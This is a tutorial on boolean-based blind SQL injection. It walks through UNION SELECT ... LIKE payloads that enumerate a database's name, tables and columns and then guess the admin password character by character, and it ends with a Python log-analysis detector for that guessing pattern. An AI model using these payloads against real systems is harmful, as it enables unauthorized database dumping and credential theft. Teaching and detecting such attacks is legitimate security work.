
# Boolean SQL Injection Blind

Note: Boolean-based SQL Injection is tedious and requires a lot of manual guessing. Use SQLmap instead.

In blind SQL injection, no error message is returned as output, so we can't directly tell whether a SQL injection vulnerability exists. Boolean means that the response is either \[true] or \[false]. In a real-world scenario, \[false] means no data is returned in the response, and \[true] means the response contains data. The aim in this type of SQL injection is to get \[true] back so that we retrieve data. Say we have the URL below.

```
http://sumwebsite.com/profile?id=1
```

The corresponding SQL query for that is below

```
select * from profiles where id = '%1%'
LIMIT 1;
```

To find a SQL injection vulnerability, we first need the number of columns in this table. We would start with a payload like the one below.

```
0' UNION SELECT 1;--
```

Using the same method, we keep increasing the numbers until no error is returned, which determines the number of columns. Once we determine the number of columns, we can start crafting payloads to enumerate the database.

```
0' UNION SELECT 1,2,3 where database()
like 's%';--
```

In the above example, we used the \[like] operator to look for the entries where there is a database whose name starts with \[s].

Since this is boolean based, we need to use the \[like] statement in order to adhere to the \[true] and \[false] forms of output.

In order to find the database name, we need to keep adding and rotating between characters until we receive a response containing the database name. The next payload would look like the one below

```
0' UNION SELECT 1,2,3 where database()
like 'sq%';--
```

Suppose you were able to find the database name and it was \[dbhacked]; you will then need to dump its tables.

```
0' UNION SELECT 1,2,3 FROM
information_schema.tables WHERE
table_schema = 'dbhacked' and table_name
like 'a%';--
```

In the same manner, keep adding characters until you hit a response containing the table name. Suppose you found a table named \[users]. You want to dump its columns.

```
0' UNION SELECT 1,2,3 FROM
information_schema.COLUMNS WHERE
TABLE_SCHEMA='dbhacked' and TABLE_NAME='users' and COLUMN_NAME like
'a%';--
```

Suppose you found the columns \[username] and \[password]. To dump them, use the payload below to find the users.

```
0' UNION SELECT 1,2,3 from users where
username like 'a%';--
```

Suppose you found a username called \[admin] then use the below to dump its password.

```
0' UNION SELECT 1,2,3 from users where
username='admin' and password like 'a%';--
```
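
From the defender's side, the character-by-character guessing described above leaves a recognizable trail in access logs: one client sending \[like] prefixes that each extend an earlier guess. The sketch below is an added example, not part of the original notes; the log format, IP addresses, thresholds and function names are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, quote_plus, urlsplit

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3}$')
# Matches the probe shape used on this page: UNION SELECT ... <expr> LIKE '<prefix>%'
PROBE_RE = re.compile(r"union\s+select\b.*?([\w.()]+)\s+like\s+'([^'%]*)%", re.I | re.S)

def like_probes(lines):
    """Yield (client, target, prefix) for each request whose id parameter holds a probe."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        for value in parse_qs(urlsplit(path).query).get("id", []):  # URL-decodes the value
            probe = PROBE_RE.search(value)
            if probe:
                yield client, probe.group(1).lower(), probe.group(2)

def flag_enumeration(lines, min_depth=3):
    """Return {(client, target): depth} for clients whose guesses form a chain of at
    least min_depth prefixes, each extending an earlier guess by one character."""
    chains = defaultdict(dict)  # (client, target) -> {prefix: chain length}
    for client, target, prefix in like_probes(lines):
        seen = chains[(client, target)]
        if prefix and prefix not in seen:
            seen[prefix] = seen.get(prefix[:-1], 0) + 1
    return {key: max(seen.values()) for key, seen in chains.items()
            if seen and max(seen.values()) >= min_depth}

def _req(client, id_value):
    """Build one constructed access-log line (assumed format: client, request, status)."""
    return f'{client} "GET /profile?id={quote_plus(id_value)} HTTP/1.1" 200'

# Constructed sample traffic; the payload shape is the one shown on this page.
PAYLOAD = "0' UNION SELECT 1,2,3 where database() like '{}%';--"
SAMPLE_LOG = (
    [_req("10.0.0.5", "1")]
    + [_req("10.0.0.5", PAYLOAD.format(p)) for p in ("a", "s", "sa", "sq", "sqa", "sql")]
    + [_req("10.0.0.9", "2"), _req("10.0.0.9", PAYLOAD.format("a"))]
)

if __name__ == "__main__":
    for (client, target), depth in flag_enumeration(SAMPLE_LOG).items():
        print(f"ALERT {client}: incremental LIKE guessing on {target}, depth {depth}")
```

This is a heuristic over GET query strings in one assumed log format; it complements parameterized queries in the application rather than replacing them.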

